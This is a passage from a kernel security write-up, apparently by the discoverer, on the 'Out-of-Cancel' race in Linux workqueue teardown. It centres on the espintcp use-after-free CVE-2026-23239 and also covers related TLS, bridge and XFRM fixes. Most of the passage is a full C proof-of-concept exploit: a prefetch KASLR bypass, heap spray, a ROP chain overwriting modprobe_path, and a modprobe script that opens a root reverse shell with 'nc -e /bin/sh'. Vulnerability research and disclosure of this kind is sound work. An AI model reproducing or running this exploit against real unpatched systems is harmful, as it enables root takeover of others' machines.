static const struct net_proto_family __rcu *net_families[NPROTO] __read_mostly;
net_families also lives in the __read_mostly section, and this region is writable. That means a write to the pwq+0xa8 offset is also possible.
To summarize, the memory layout of struct work_struct required to reach RIP control looks as follows. In the test environment, the element at the pwq+0x08 position corresponds to AF_CAN, so the diagram is drawn based on that.
Heap Spray with user_key_payload
Since the UAF object, ctx, is allocated with GFP_KERNEL, a struct user_key_payload, which is also allocated with GFP_KERNEL, is used as the heap spray object. Because cross cache is not used here, the allocation flags need to match in this step.
static int espintcp_init_sk(struct sock *sk)
{
struct espintcp_ctx *ctx;
ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);
[...]
}
struct user_key_payload has a header made up of rcu and datalen, so when placing the payload, the offset needs to be calculated with this header size in mind.
struct user_key_payload {
struct rcu_head rcu; /* RCU destructor */
unsigned short datalen; /* length of this data */
char data[] __aligned(__alignof__(u64)); /* actual data */
};
Construction of the ROP Payload
ctx->work.func and the ROP payload can be arranged along the following lines. Since the point where RIP control is obtained is in the kworker context, it is not possible to return directly to user space. For this reason, this exploit builds the payload by overwriting modprobe_path[].
ctx->work.func = push_rdi_pop_rsp_pop_rbx_pop_r12_pop_r13_pop_r14_ret;
ctx->payload[t++] = pop_rdi_pop_rsi_pop_rdx_pop_rcx_ret;
ctx->payload[t++] = modprobe_path;
ctx->payload[t++] = (void *)fake_modprobe;
ctx->payload[t++] = (void *)strlen(fake_modprobe);
ctx->payload[t++] = 0;
ctx->payload[t++] = _copy_from_user;
ctx->payload[t++] = pop_rbx_ret;
ctx->payload[t++] = (void *)30000;
ctx->payload[t++] = mdelay;
At this point, execution must not return immediately after the preceding copy_from_user() call; it has to stay in place until a root shell is obtained. The reason is that, during the object reallocation phase, ctx->work.entry.prev is overwritten, so __list_del() cannot unlink the node cleanly and a corrupted node remains in pool->worklist. If a kworker that uses this pool wakes up again in this state, it will dereference that corrupted node and the kernel will panic.
For the waiting period, mdelay() must be used instead of msleep(). msleep() calls schedule() internally and yields the CPU. If the current task is running in a worker context, this can cause a new kworker (for example, kworker/0:1, kworker/0:2, …) to be spawned on the same CPU and continue processing. In that case, pool->worklist will be accessed again, and the previously left corrupted node may be dereferenced, leading to a kernel panic.
static inline void sched_submit_work(struct task_struct *tsk)
{
static DEFINE_WAIT_OVERRIDE_MAP(sched_map, LD_WAIT_CONFIG);
unsigned int task_flags;
/*
* Establish LD_WAIT_CONFIG context to ensure none of the code called
* will use a blocking primitive -- which would lead to recursion.
*/
lock_map_acquire_try(&sched_map);
task_flags = tsk->flags;
/*
* If a worker goes to sleep, notify and ask workqueue whether it
* wants to wake up a task to maintain concurrency.
*/
if (task_flags & PF_WQ_WORKER)
wq_worker_sleeping(tsk);
[...]
}
In addition, mdelay is defined as a macro, so it cannot be called directly like a normal function, and udelay only allows a limited delay to be specified as an argument. To introduce a sufficiently long delay, the assembly sequence generated by code that calls mdelay() has to be reused instead.
#define mdelay(n) (\
(__builtin_constant_p(n) && (n)<=MAX_UDELAY_MS) ? udelay((n)*1000) : \
({unsigned long __ms=(n); while (__ms--) udelay(1000);}))
0xffffffff81439fe7 <suspend_test+39>: mov edi,0x418958
0xffffffff81439fec <suspend_test+44>: call 0xffffffff828d9ec0 <__const_udelay>
0xffffffff81439ff1 <suspend_test+49>: sub rbx,0x1
0xffffffff81439ff5 <suspend_test+53>: jne 0xffffffff81439fe7 <suspend_test+39>
0xffffffff81439ff7 <suspend_test+55>: mov eax,0x1
0xffffffff81439ffc <suspend_test+60>: pop rbx
0xffffffff81439ffd <suspend_test+61>: ret
In this exploit, the path written to modprobe_path points to a script that launches a reverse shell.
#define MODPROBE_SCRIPT "#!/bin/sh\nnc 127.0.0.1 4444 -e /bin/sh\n"
char fake_modprobe[40] = {0};
int modprobe_script_fd = memfd_create("", MFD_CLOEXEC);
pid_t pid = getpid();
dprintf(modprobe_script_fd, MODPROBE_SCRIPT);
snprintf(fake_modprobe, sizeof(fake_modprobe), "/proc/%i/fd/%i", pid, modprobe_script_fd);
While the kworker is busy-waiting in mdelay(), triggering request_module() from another CPU will result in a root privileged reverse shell being spawned.
Full Exploit Chain
The full exploit code is available here:
Exploit Code
/*
* PoC for: Out-of-Cancel Race in espintcp (CVE-2026-23239)
*
* Affected:
* - Linux kernel < v7.0-rc2
* - x86_64, tested with CONFIG_XFRM_ESPINTCP=y, CONFIG_PREEMPT=n
*
* Usage:
* $ gcc -o exploit exploit.c -pthread
* $ ./exploit &
* $ nc -lvp 4444
*
* Author: Hyunwoo Kim (V4bel)
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/tcp.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <sys/timerfd.h>
#include <sys/epoll.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <linux/prctl.h>
#include <sched.h>
#include <sys/syscall.h>
#include <sys/xattr.h>
#include <pthread.h>
#include <linux/keyctl.h>
#include <sys/sendfile.h>
#include <linux/if_alg.h>
#include <sys/resource.h>
#include <limits.h>
#define FAIL_IF(x) if ((x)) { \
perror(#x); \
return -1; \
}
#define STACK_SIZE 0x8000
#define MAIN_CPU 0
#define HELPER_CPU 1
#define TRIG_ERROR 0
#define TRIG_RETRY 1
#define KEY_SPRAY_COUNT 20
#define IKE_COUNT 30
#define RCV_QUEUE_COUNT 1000000
#define SENDMSG_COUNT 100000
#define GROOMING_COUNT 500
#define DELAY_STAGE_1 16080
#define DELAY_STAGE_2 17000
struct list_head {
struct list_head *next;
struct list_head *prev;
};
struct work_struct {
void *data;
struct list_head entry;
void *func;
};
struct espintcp_ctx {
char dummy_1[1056 - 24];
struct work_struct work;
void *payload[10];
};
char tfd_buf[0x1000];
int g_tfd;
int epoll_fds[0x2c0];
int epoll_timefds[0x300];
int fds[500];
void *trigger_stack = NULL;
volatile int status_trig = TRIG_ERROR;
struct espintcp_ctx *ctx;
pthread_attr_t attr;
cpu_set_t cpus;
uint64_t kbase = 0xffffffff81000000;
uint64_t find_min(uint64_t arr[], int size) {
if (size <= 0) {
printf("Array size must be greater than 0.\n");
return INT_MAX;
}
uint64_t min = arr[0];
for (int i = 1; i < size; i++) {
if (arr[i] < min) {
min = arr[i];
}
}
return min;
}
// KASLR bypass
// This code is adapted from https://github.com/IAIK/prefetch/blob/master/cacheutils.h
inline __attribute__((always_inline)) uint64_t rdtsc_begin() {
uint64_t a, d;
asm volatile ("mfence\n\t"
"RDTSCP\n\t"
"mov %%rdx, %0\n\t"
"mov %%rax, %1\n\t"
"xor %%rax, %%rax\n\t"
"lfence\n\t"
: "=r" (d), "=r" (a)
:
: "%rax", "%rbx", "%rcx", "%rdx");
a = (d<<32) | a;
return a;
}
inline __attribute__((always_inline)) uint64_t rdtsc_end() {
uint64_t a, d;
asm volatile(
"xor %%rax, %%rax\n\t"
"lfence\n\t"
"RDTSCP\n\t"
"mov %%rdx, %0\n\t"
"mov %%rax, %1\n\t"
"mfence\n\t"
: "=r" (d), "=r" (a)
:
: "%rax", "%rbx", "%rcx", "%rdx");
a = (d<<32) | a;
return a;
}
void prefetch(void* p)
{
asm volatile (
"prefetchnta (%0)\n"
"prefetcht2 (%0)\n"
: : "r" (p));
}
size_t flushandreload(void* addr)
{
size_t time = rdtsc_begin();
prefetch(addr);
size_t delta = rdtsc_end() - time;
return delta;
}
#define PREFETCH_ITER 25
#define KASLR_BYPASS_INTEL 1
#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0]))
int bypass_kaslr(uint64_t base) {
if (!base) {
#ifdef KASLR_BYPASS_INTEL
#define OFFSET 0
#define START (0xffffffff81000000ull + OFFSET)
#define END (0xffffffffD0000000ull + OFFSET)
#define STEP 0x0000000001000000ull
while (1) {
uint64_t bases[7] = {0};
for (int vote = 0; vote < ARRAY_LEN(bases); vote ++) {
size_t times[(END - START) / STEP] = {};
uint64_t addrs[(END - START) / STEP];
for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
times[ti] = ~0;
addrs[ti] = START + STEP * (uint64_t)ti;
}
for (int i = 0; i < 16; i++) {
for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
uint64_t addr = addrs[ti];
size_t t = flushandreload((void*)addr);
if (t < times[ti]) {
times[ti] = t;
}
}
}
size_t minv = ~0;
size_t mini = -1;
for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) {
if (times[ti] < minv) {
mini = ti;
minv = times[ti];
}
}
if (mini < 0) {
return -1;
}
bases[vote] = addrs[mini];
}
int c = 0;
for (int i = 0; i < ARRAY_LEN(bases); i++) {
if (c == 0) {
base = bases[i];
} else if (base == bases[i]) {
c++;
} else {
c--;
}
}
c = 0;
for (int i = 0; i < ARRAY_LEN(bases); i++) {
if (base == bases[i]) {
c++;
}
}
if (c > ARRAY_LEN(bases) / 2) {
base -= OFFSET;
goto got_base;
}
}
#else
#define START (0xffffffff81000000ull)
#define END (0xffffffffc0000000ull)
#define STEP 0x0000000000200000ull
#define NUM_TRIALS 7
// largest contiguous mapped area at the beginning of _stext
#define WINDOW_SIZE 11
while (1) {
uint64_t bases[NUM_TRIALS] = {0};
for (int vote = 0; vote < ARRAY_LEN(bases); vote ++) {
size_t times[(END - START) / STEP] = {};
uint64_t addrs[(END - START) / STEP];
for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
times[ti] = ~0;
addrs[ti] = START + STEP * (uint64_t)ti;
}
for (int i = 0; i < 16; i++) {
for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
uint64_t addr = addrs[ti];
size_t t = flushandreload((void*)addr);
if (t < times[ti]) {
times[ti] = t;
}
}
}
uint64_t max = 0;
int max_i = 0;
for (int ti = 0; ti < ARRAY_LEN(times) - WINDOW_SIZE; ti++) {
uint64_t sum = 0;
for (int i = 0; i < WINDOW_SIZE; i++) {
sum += times[ti + i];
}
if (sum > max) {
max = sum;
max_i = ti;
}
}
bases[vote] = addrs[max_i];
}
int c = 0;
for (int i = 0; i < ARRAY_LEN(bases); i++) {
if (c == 0) {
base = bases[i];
} else if (base == bases[i]) {
c++;
} else {
c--;
}
}
c = 0;
for (int i = 0; i < ARRAY_LEN(bases); i++) {
if (base == bases[i]) {
c++;
}
}
if (c > ARRAY_LEN(bases) / 2) {
goto got_base;
}
}
#endif
}
got_base:
kbase = base;
return 0;
}
inline static int _pin_to_cpu(int id)
{
cpu_set_t set;
CPU_ZERO(&set);
CPU_SET(id, &set);
return sched_setaffinity(getpid(), sizeof(set), &set);
}
static void epoll_ctl_add(int epfd, int fd, uint32_t events)
{
struct epoll_event ev;
ev.events = events;
ev.data.fd = fd;
epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &ev);
}
void do_epoll_enqueue(int fd)
{
int cfd[2];
socketpair(AF_UNIX, SOCK_STREAM, 0, cfd);
for (int k = 0; k < 0x10; k++)
{
if (fork() == 0)
{
for (int i = 0; i < 0x300; i++)
{
epoll_timefds[i] = dup(fd);
}
for (int i = 0; i < 0x2c0; i++)
{
epoll_fds[i] = epoll_create(0x1);
}
for (int i = 0; i < 0x2c0; i++)
{
for (int j = 0; j < 0x300; j++)
{
epoll_ctl_add(epoll_fds[i], epoll_timefds[j], 0);
}
}
write(cfd[1], tfd_buf, 1);
raise(SIGSTOP);
}
read(cfd[0], tfd_buf, 1);
}
close(cfd[0]);
close(cfd[1]);
}
static int enable_espintcp(int fd, const char *tag)
{
const char *ulp = "espintcp";
int ret = setsockopt(fd, IPPROTO_TCP, TCP_ULP, ulp, strlen(ulp));
if (ret < 0) {
fprintf(stderr, "[%s] setsockopt(TCP_ULP, \"espintcp\") failed: %s\n",
tag, strerror(errno));
return -1;
}
return 0;
}
void heap_grooming(void) {
for (int i = 0; i < GROOMING_COUNT; i++) {
fds[i] = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
enable_espintcp(fds[i], "grooming");
}
}
long add_key(const char *type, const char *description, const void *payload, size_t plen, int32_t ringid) {
return syscall(__NR_add_key, type, description, payload, plen, ringid);
}
void *key_spray(void *arg)
{
char desc[64];
int i;
long key_id;
for (i = 0; i < KEY_SPRAY_COUNT; i++) {
snprintf(desc, sizeof(desc), "spray_key_%d", i);
key_id = add_key("user", desc, (void *)ctx, sizeof(struct espintcp_ctx), KEY_SPEC_PROCESS_KEYRING);
if (key_id < 0) {
break;
}
}
return NULL;
}
static int run_server(int s2c[], int c2s[])
{
int listen_fd = -1, conn_fd = -1;
struct sockaddr_in addr, cliaddr;
socklen_t cli_len = sizeof(cliaddr);
char buf[1024];
ssize_t n;
char c = 'x';
pthread_t th;
struct sockaddr_alg sa;
int alg_fd;
_pin_to_cpu(HELPER_CPU);
listen_fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (listen_fd < 0) {
perror("[server] socket()");
return -1;
}
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
addr.sin_port = htons(5000);
if (bind(listen_fd, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
perror("[server] bind()");
return -1;
}
if (listen(listen_fd, 16) < 0) {
perror("[server] listen()");
return -1;
}
conn_fd = accept(listen_fd, (struct sockaddr *)&cliaddr, &cli_len);
if (conn_fd < 0) {
perror("[server] accept()");
return -1;
}
int flags = fcntl(conn_fd, F_GETFL, 0);
fcntl(conn_fd, F_SETFL, flags | O_NONBLOCK);
int flag = 1;
if (setsockopt(conn_fd, IPPROTO_TCP, TCP_NODELAY, &flag, sizeof(flag)) < 0) {
perror("setsockopt(TCP_NODELAY)");
}
unsigned char msg[7];
msg[0] = 0x00; msg[1] = 0x07; // full_len = 7
msg[2] = 0x00; msg[3] = 0x00; msg[4] = 0x00; msg[5] = 0x00; // marker = 0
msg[6] = 0x01; // extra
for (int i = 0; i < IKE_COUNT; i++) {
ssize_t n = write(conn_fd, msg, sizeof(msg));
}
for (int i = 0; i < RCV_QUEUE_COUNT; i++) {
ssize_t n = write(conn_fd, buf, 7);
}
printf("step 2\n");
write(s2c[1], &c, 1);
read(c2s[0], &c, 1);
printf("step 5\n");
usleep(DELAY_STAGE_2);
if (pthread_create(&th, &attr, key_spray, NULL) != 0) {
perror("pthread_create()");
return -1;
}
pthread_join(th, NULL);
close(conn_fd);
close(listen_fd);
return 0;
}
static int run_client(int s2c[], int c2s[])
{
int fd;
struct sockaddr_in addr;
char buf[1024];
char c;
sleep(1);
fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (fd < 0) {
perror("[client] socket");
return -1;
}
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
addr.sin_port = htons(5000);
printf("[client] connect() before\n");
if (connect(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
perror("[client] connect");
return -1;
}
printf("[client] connect() after - connected to 127.0.0.1:5000\n");
int sndbuf = 1024;
if (setsockopt(fd, SOL_SOCKET, SO_SNDBUF, &sndbuf, sizeof(sndbuf)) < 0) {
perror("[client] setsockopt(SO_SNDBUF)");
} else {
printf("[client] SO_SNDBUF set to %d bytes\n", sndbuf);
}
if (enable_espintcp(fd, "client") < 0) {
return -1;
}
int flags = fcntl(fd, F_GETFL, 0);
fcntl(fd, F_SETFL, flags | O_NONBLOCK);
int rcvbuf = 900*1024*1024;
setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof(rcvbuf));
printf("step 1\n");
read(s2c[0], &c, 1);
printf("step 3\n");
memset(buf, 'A', sizeof(buf));
for (int i = 0; i < SENDMSG_COUNT; i++) {
ssize_t n = write(fd, buf, sizeof(buf));
}
printf("step 4\n");
write(c2s[1], &c, 1);
usleep(DELAY_STAGE_1);
struct itimerspec new = {.it_value.tv_nsec = 11000};
timerfd_settime(g_tfd, TFD_TIMER_CANCEL_ON_SET, &new, NULL);
close(fd);
return 0;
}
int race_trigger(void *arg)
{
int s2c[2]; // parent -> child
int c2s[2]; // child -> parent
status_trig = TRIG_ERROR;
pipe(s2c);
pipe(c2s);
_pin_to_cpu(MAIN_CPU);
heap_grooming();
pid_t pid = fork();
if (pid == 0) {
// child: client
close(s2c[1]);
close(c2s[0]);
return run_client(s2c, c2s);
} else {
// parent: server
int status = 0;
int ret;
close(s2c[0]);
close(c2s[1]);
ret = run_server(s2c, c2s);
waitpid(pid, &status, 0);
printf("[main] client exited with status %d\n", status);
usleep(3000);
status_trig = TRIG_RETRY;
return ret;
}
return 0;
}
#define MODPROBE_SCRIPT "#!/bin/sh\nnc 127.0.0.1 4444 -e /bin/sh\n"
#define WORK_STRUCT_PWQ 4
unsigned long long int net_families_can;
void *modprobe_path;
void *push_rdi_pop_rsp_pop_rbx_pop_r12_pop_r13_pop_r14_ret;
void *pop_rdi_pop_rsi_pop_rdx_pop_rcx_ret;
void *pop_rbx_ret;
void *_copy_from_user;
void *mdelay;
unsigned long long int fake_net_families_can;
void *bind_thread(void *arg)
{
struct sockaddr_alg sa;
int alg_fd;
alg_fd = socket(AF_ALG, SOCK_SEQPACKET, 0);
memset(&sa, 0, sizeof(sa));
sa.salg_family = AF_ALG;
strcpy((char *)sa.salg_type, "V4bel");
while (1) {
usleep(500000);
bind(alg_fd, (struct sockaddr *)&sa, sizeof(sa));
}
}
int prepare_rop_payload()
{
char fake_modprobe[40] = {0};
pid_t pid = getpid();
pthread_attr_t attr_bind;
cpu_set_t cpus_bind;
pthread_t th_bind;
int modprobe_script_fd = memfd_create("", MFD_CLOEXEC);
dprintf(modprobe_script_fd, MODPROBE_SCRIPT);
snprintf(fake_modprobe, sizeof(fake_modprobe), "/proc/%i/fd/%i", pid, modprobe_script_fd);
ctx = malloc(sizeof(struct espintcp_ctx));
if (!ctx) {
perror("malloc()");
return -1;
}
memset(ctx, 0, sizeof(struct espintcp_ctx));
fake_net_families_can = (net_families_can - 8) | WORK_STRUCT_PWQ;
ctx->work.entry.next = modprobe_path;
ctx->work.entry.prev = modprobe_path;
ctx->work.data = (void *)fake_net_families_can;
ctx->work.func = push_rdi_pop_rsp_pop_rbx_pop_r12_pop_r13_pop_r14_ret;
int t = 0;
ctx->payload[t++] = pop_rdi_pop_rsi_pop_rdx_pop_rcx_ret;
ctx->payload[t++] = modprobe_path;
ctx->payload[t++] = (void *)fake_modprobe;
ctx->payload[t++] = (void *)strlen(fake_modprobe);
ctx->payload[t++] = 0;
ctx->payload[t++] = _copy_from_user;
ctx->payload[t++] = pop_rbx_ret;
ctx->payload[t++] = (void *)30000;
ctx->payload[t++] = mdelay;
ctx->payload[t++] = 0;
pthread_attr_init(&attr_bind);
CPU_ZERO(&cpus_bind);
CPU_SET(1, &cpus_bind);
if (pthread_attr_setaffinity_np(&attr_bind, sizeof(cpu_set_t), &cpus_bind) != 0) {
perror("pthread_attr_setaffinity_np()");
return -1;
}
if (pthread_create(&th_bind, &attr_bind, bind_thread, NULL) != 0) {
perror("pthread_create()");
return -1;
}
return 0;
}
void prefetch_attack()
{
uint64_t bases[PREFETCH_ITER] = {0,};
for (int i = 0 ; i < PREFETCH_ITER; i++) {
bypass_kaslr(0);
bases[i] = kbase;
}
kbase = find_min(bases, PREFETCH_ITER);
printf("kbase: 0x%lx\n", kbase);
net_families_can = kbase + 0x... + 0xe8;
modprobe_path = (void *)(kbase + 0x...);
push_rdi_pop_rsp_pop_rbx_pop_r12_pop_r13_pop_r14_ret = (void *)(kbase + 0x...);
pop_rdi_pop_rsi_pop_rdx_pop_rcx_ret = (void *)(kbase + 0x...);
pop_rbx_ret = (void *)(kbase + 0x...);
_copy_from_user = (void *)(kbase + 0x...);
mdelay = (void *)(kbase + 0x...);
}
int main(int argc, char *argv[])
{
prefetch_attack();
if (prepare_rop_payload()) {
perror("prepare_rop_payload()");
return -1;
}
pthread_attr_init(&attr);
CPU_ZERO(&cpus);
CPU_SET(0, &cpus);
if (pthread_attr_setaffinity_np(&attr, sizeof(cpu_set_t), &cpus) != 0) {
perror("pthread_attr_setaffinity_np()");
return -1;
}
g_tfd = timerfd_create(CLOCK_MONOTONIC, 0);
do_epoll_enqueue(g_tfd);
trigger_stack = mmap(NULL, STACK_SIZE, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
FAIL_IF(trigger_stack == MAP_FAILED);
trigger_stack += 0x8000;
do {
int race_trigger_pid = clone(race_trigger, trigger_stack, CLONE_VM | SIGCHLD, NULL);
FAIL_IF(race_trigger_pid < 0);
FAIL_IF(waitpid(race_trigger_pid, NULL, 0) < 0);
} while (status_trig == TRIG_RETRY);
return 0;
}
Because almost every step in this race scenario behaves non-deterministically, the delay values inserted at each stage have to be tuned manually for the target environment. For example, when testing in a VMware guest, the APIC timer is often observed to arrive much later than expected, which appears to be one of the side effects caused by vCPU preemption.
This is also why I did not try to stabilize the exploit by measuring execution time with rdtsc and dynamically adjusting the relative delays between stages based on that value. Even in the same environment, using the same delays (even with busy-wait loops) does not guarantee the same execution order each time. It is not possible to predict exactly when softirqs or hardirqs will be handled, or when a context switch will complete.
Patching espintcp
This espintcp vulnerability was fixed by changing cancel_work_sync() to disable_work_sync() in commit e1512c1db9e8.
diff --git a/net/xfrm/espintcp.c b/net/xfrm/espintcp.c
index bf744ac9d5a7..8709df716e98 100644
--- a/net/xfrm/espintcp.c
+++ b/net/xfrm/espintcp.c
@@ -536,7 +536,7 @@ static void espintcp_close(struct sock *sk, long timeout)
sk->sk_prot = &tcp_prot;
barrier();
- cancel_work_sync(&ctx->work);
+ disable_work_sync(&ctx->work);
strp_done(&ctx->strp);
skb_queue_purge(&ctx->out_queue);
The disclosure timeline is as follows:
- 2026-02-03: Submitted the vulnerability report to security@kernel.org
- 2026-02-16: Submitted the v1 patch to the public netdev mailing list
- 2026-02-27: The patch was merged into the mainline kernel
Generalizing Out-of-Cancel
Issues belonging to this bug class are not limited to espintcp, and the same pattern can be found across the networking subsystem.
TLS TX Cancellation Race (CVE-2026-23240)
In net/tls/tls_sw.c, the function tls_sw_cancel_work_tx() calls cancel_delayed_work_sync() to cancel ctx->tx_work.work. As in the espintcp case, tls_write_space(), which is invoked from the ->sk_write_space() path, can re-schedule ctx->tx_work.work, leaving room for a race condition.
CVE-2026-23240 was fixed in commit 7bb09315f93d as follows:
diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
index 9937d4c810f2..b1fa62de9dab 100644
--- a/net/tls/tls_sw.c
+++ b/net/tls/tls_sw.c
@@ -2533,7 +2533,7 @@ void tls_sw_cancel_work_tx(struct tls_context *tls_ctx)
set_bit(BIT_TX_CLOSING, &ctx->tx_bitmask);
set_bit(BIT_TX_SCHEDULED, &ctx->tx_bitmask);
- cancel_delayed_work_sync(&ctx->tx_work.work);
+ disable_delayed_work_sync(&ctx->tx_work.work);
}
void tls_sw_release_resources_tx(struct sock *sk)
Bridge CFM Cancellation Race
In net/bridge/br_cfm.c, the function br_cfm_cc_peer_mep_remove() calls cancel_delayed_work_sync() to cancel peer_mep->ccm_rx_dwork. During this process, br_cfm_frame_rx(), which runs in softirq context, can re-schedule peer_mep->ccm_rx_dwork via ccm_rx_timer_start() upon CCM frame reception, leaving room for a race condition where the work is re-queued between the return of cancel_delayed_work_sync() and kfree_rcu().
This vulnerability was patched in 3715a0085531 as follows.
diff --git a/net/bridge/br_cfm.c b/net/bridge/br_cfm.c
index 2c70fe47de38..118c7ea48c35 100644
--- a/net/bridge/br_cfm.c
+++ b/net/bridge/br_cfm.c
@@ -576,7 +576,7 @@ static void mep_delete_implementation(struct net_bridge *br,
/* Empty and free peer MEP list */
hlist_for_each_entry_safe(peer_mep, n_store, &mep->peer_mep_list, head) {
- cancel_delayed_work_sync(&peer_mep->ccm_rx_dwork);
+ disable_delayed_work_sync(&peer_mep->ccm_rx_dwork);
hlist_del_rcu(&peer_mep->head);
kfree_rcu(peer_mep, rcu);
}
@@ -732,7 +732,7 @@ int br_cfm_cc_peer_mep_remove(struct net_bridge *br, const u32 instance,
return -ENOENT;
}
- cc_peer_disable(peer_mep);
+ disable_delayed_work_sync(&peer_mep->ccm_rx_dwork);
hlist_del_rcu(&peer_mep->head);
kfree_rcu(peer_mep, rcu);
XFRM Cancellation Race
In net/xfrm/xfrm_nat_keepalive.c, the function xfrm_nat_keepalive_net_fini() calls cancel_delayed_work_sync() to cancel net->xfrm.nat_keepalive_work. During this process, xfrm_state_fini(), which is called subsequently, flushes remaining states via __xfrm_state_delete(), causing xfrm_nat_keepalive_state_updated() to re-schedule nat_keepalive_work, leaving room for a race condition where the work executes on freed memory after the network namespace structure has been deallocated.
This vulnerability was patched in ipsec tree daf8e3b253aa as follows.
diff --git a/net/xfrm/xfrm_nat_keepalive.c b/net/xfrm/xfrm_nat_keepalive.c
index ebf95d48e86c..1856beee0149 100644
--- a/net/xfrm/xfrm_nat_keepalive.c
+++ b/net/xfrm/xfrm_nat_keepalive.c
@@ -261,7 +261,7 @@ int __net_init xfrm_nat_keepalive_net_init(struct net *net)
int xfrm_nat_keepalive_net_fini(struct net *net)
{
- cancel_delayed_work_sync(&net->xfrm.nat_keepalive_work);
+ disable_delayed_work_sync(&net->xfrm.nat_keepalive_work);
return 0;
}
Beyond these, a significant number of additional vulnerabilities in this class are currently going through the disclosure process. This article will be updated as their patches become publicly available.
Conclusion
In this work, a race-based vulnerability class arising from common usage patterns of the cancel_work_sync() and cancel_delayed_work_sync() APIs was organized under the name Out-of-Cancel, and it was shown that the same issue appears repeatedly in multiple ULP teardown paths, including espintcp. The core of this bug class is that "cancellation" does not guarantee that a work item will never be scheduled again, which creates a critical gap between object lifetime management and worker scheduling.
As seen in real cases, simply calling a cancellation API is not enough to block the race, and an explicit step to disable the work item is required. This is also reflected in the fact that different code paths, such as espintcp, TLS, Bridge and XFRM, all converge on the same direction of fixes. This pattern suggests that the problem is not confined to a specific subsystem, but is a structural issue that needs to be revisited across asynchronous work cancellation mechanisms in general.
Out-of-Cancel is less about an implementation mistake and more about a subtle mismatch between the semantics of the API and how it is used. In future code that relies on similar asynchronous execution models, it will be necessary to draw a clearer line between “cancellation” and “disabling”, and to explicitly validate how these operations interact with object lifetimes.
When such a mismatch occurs, a worker may still be scheduled after its associated object has been freed, eventually reaching process_one_work() in the kworker context. If the freed object is reallocated under attacker control, this can lead to RIP control, making it a powerful bug class in the Linux kernel.
These vulnerabilities typically surface in object teardown paths such as close, where object destruction intersects with asynchronous work cancellation. Exploiting them therefore requires arranging for the object to be freed and reclaimed before the worker actually runs. As demonstrated in the espintcp race scenario, an exploit can be constructed by carefully combining subsystem-specific teardown logic with the kernel’s interleaving behavior.